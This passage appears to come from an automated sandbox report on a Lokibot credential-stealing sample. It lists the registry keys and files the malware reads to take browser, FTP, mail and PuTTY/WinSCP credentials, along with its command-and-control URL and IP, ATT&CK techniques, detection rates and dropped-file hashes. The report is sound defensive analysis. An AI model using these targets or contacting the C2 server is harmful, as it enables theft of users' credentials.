                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Code function: 1_2_00406069 GetUserNameW, 1_2_00406069
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    Yara detected Lokibot
                    Source: Yara match | File source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 7108, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 4852, type: MEMORY
                    Source: Yara match | File source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPE
                    Yara detected Lokibot
                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                    Tries to steal Mail credentials (via file access)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Code function: PopPassword 1_2_0040D069
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Code function: SmtpPassword 1_2_0040D069

                    Remote Access Functionality:

                    Yara detected Lokibot
                    Source: Yara match | File source: dump.pcap, type: PCAP

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | Command and Scripting Interpreter 2 | Path Interception | Access Token Manipulation 1 | Disable or Modify Tools 1 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 12 | Deobfuscate/Decode Files or Information 1 | Credentials in Registry 2 | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 4 | Security Account Manager | System Information Discovery 13 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 12 | NTDS | Security Software Discovery 111 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Timestomp 1 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Process Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 12 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label | Link
                    SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | 40% | Virustotal | | Browse
                    SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Burkina |
                    SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | 100% | Joe Sandbox ML | |

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    Source | Detection | Scanner | Label | Link | Download
                    1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File

                    Domains

                    Source | Detection | Scanner | Label | Link
                    nevomw.com | 11% | Virustotal | | Browse

                    URLs

                    Source | Detection | Scanner | Label | Link
                    http://www.fontbureau.comce9 | 0% | Avira URL Cloud | safe |
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
                    http://www.ibsensoftware.com/ | 0% | URL Reputation | safe |
                    http://www.tiro.com | 0% | URL Reputation | safe |
                    http://www.fontbureau.comuec | 0% | Avira URL Cloud | safe |
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe |
                    http://www.fontbureau.coma | 0% | URL Reputation | safe |
                    http://nevomw.com/candy/five/fre.php | 12% | Virustotal | | Browse
                    http://nevomw.com/candy/five/fre.php | 0% | Avira URL Cloud | safe |
                    http://www.carterandcone.coml | 0% | URL Reputation | safe |
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe |
                    http://www.typography.netD | 0% | URL Reputation | safe |
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
                    http://fontfabrik.com | 0% | URL Reputation | safe |
                    http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
                    http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
                    http://www.sandoll.co.kr | 0% | URL Reputation | safe |
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
                    http://www.sakkal.com | 0% | URL Reputation | safe |
                    http://www.fontbureau.comai | 0% | Avira URL Cloud | safe |

                    Domains and IPs

                    Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    nevomw.com | 45.144.3.234 | true | true | | unknown
                    g.msn.com | unknown | unknown | false | | high

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    http://nevomw.com/candy/five/fre.php | true | 12%, Virustotal, Browse; Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://www.apache.org/licenses/LICENSE-2.0 | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | | high
                      http://www.fontbureau.com | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | | high
                      http://www.fontbureau.com/designersG | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | | high
                      http://www.fontbureau.com/designers/? | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | | high
                      http://www.fontbureau.comce9 | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
                      http://www.founder.com.cn/cn/bThe | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers? | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | | high
                      http://www.ibsensoftware.com/ | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.tiro.com | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | | high
                      http://www.fontbureau.comuec | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
                      http://www.goodfont.co.kr | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.coma | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
                      http://www.carterandcone.coml | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.sajatypeworks.com | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.typography.netD | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers/cabarga.htmlN | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | | high
                      http://www.founder.com.cn/cn/cThe | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.galapagosdesign.com/staff/dennis.htm | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://fontfabrik.com | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://www.founder.com.cn/cn | SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers8SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fonts.comSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.sandoll.co.krSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.urwpp.deDPleaseSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cnSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sakkal.comSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comaiSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown

                                            Contacted IPs


                                            Public

                                            IP | Domain | Country | ASN | ASN Name | Malicious
                                            45.144.3.234 | unknown | Russian Federation | 51659 | ASBAXETRU | true

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:325825
                                            Start date:02.12.2020
                                            Start time:11:51:31
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 6m 53s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770 (renamed file extension from 20770 to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@3/3@247/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 17% (good quality ratio 16.3%)
                                            • Quality average: 77%
                                            • Quality standard deviation: 28.4%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 100
                                            • Number of non-executed functions: 10
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.255.188.83, 40.88.32.150, 51.104.139.180, 52.155.217.156, 20.54.26.129, 2.20.142.210, 2.20.142.209, 51.103.5.159, 104.43.193.48, 52.142.114.176, 92.122.144.200
                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            Time | Type | Description
                                            11:52:36 | API Interceptor | 260x Sleep call for process: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            Match | Associated Sample Name / URL | Detection | Context
                                            45.144.3.234 | niteEnrgy.xlsx | malicious | qreenmaple.com/baba/baba1/fre.php
                                            45.144.3.234 | PI.xlsx | malicious | nevomw.com/candy/five/fre.php
                                            45.144.3.234 | 6sgE9EFquRq5FpK.exe | malicious | lmpulsefashion.net/bryt/bryt2/fre.php

                                            Domains


                                            ASN


                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.log
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1301
                                            Entropy (8bit):5.345637324625647
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                            MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                            SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                            SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                            SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 1
                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):47873
                                            Entropy (8bit):0.7460804838839109
                                            Encrypted:false
                                            SSDEEP:48:399999999999999999999999999999999999999999999999999999999999999b:7
                                            MD5:C596D8424366782AFBB9AC2600358887
                                            SHA1:A736CBB9372AB1DC21F8BF495EE9EE37898A704F
                                            SHA-256:158975CC68CFE4BCF5AF3FE1366250CFBA502A87315A4DC623B47CC56FCFF38C
                                            SHA-512:EF54E22A010CC553A94E94FD7D67FF82C439AEF6101EF86DC3F7C2AE148E19DEF18CD0BEC4AAC81982F3E9D444A6CD973988FCDA842EBB0DB4159833907A5102
                                            Malicious:false
                                            Reputation:low

                                            Static File Info

